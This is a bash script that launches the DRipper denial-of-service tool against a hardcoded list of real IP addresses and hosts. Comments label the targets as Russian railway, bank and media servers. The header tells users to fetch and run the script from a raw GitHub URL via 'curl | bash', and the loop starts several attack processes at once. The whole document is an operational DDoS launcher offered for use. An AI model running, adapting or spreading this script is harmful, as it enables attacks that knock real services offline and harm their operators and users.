##### Use next command in local linux terminal to run this script. #####
# >>>   curl -s https://raw.githubusercontent.com/KarboDuck/karbo-wiki/master/DRipper_main | bash   <<<

##### To kill script CTRL+C will not be sufficient.
##### Open other terminal and run 'pkill -9 python3'. Then press CTRL+C in terminal where DRipper was launched.

#!/bin/bash
num_of_targets_to_attack=4

declare -a targets
###################### LIST OF TARGETS #########################
targets[0]="193.104.87.251 80 tcp"       #РЖД
targets[1]="194.84.25.50 80 tcp"         #РЖД
targets[2]="5.188.56.124 22 tcp"         #админ сервер ВТБ
targets[3]="194.54.14.131 4477 tcp"      #порт додатку сбера
targets[4]="rt.com 80 tcp"               #rt.com http
targets[5]="rt.com 443 tcp"              #rt.com https
################################################################
list_size=${#targets[*]}

echo "number of targets in list: " $number_of_targets

# Get random number(s) to choose random targets from array "targets"
random_numbers=$(shuf -i 1-$list_size -n $num_of_targets_to_attack)

# Launch several copies of DRipper. All output will run in single terminal so will be slightly messy.
for i in $(seq 1 $num_of_targets_to_attack)
do
             # Get address, port and protocol from choosen target site
             addr=$(echo ${targets[i]} | awk '{print $1}')
             port=$(echo ${targets[i]} | awk '{print $2}')
             prot=$(echo ${targets[i]} | awk '{print $3}')
             
             echo $addr $port $prot
             sleep 1
            
             # Launch DRipper to attack site choosen above
             python3 -u ~/russia_ddos/DRipper.py -l 2048 -s $addr -p $port -m $prot -t 50&
done
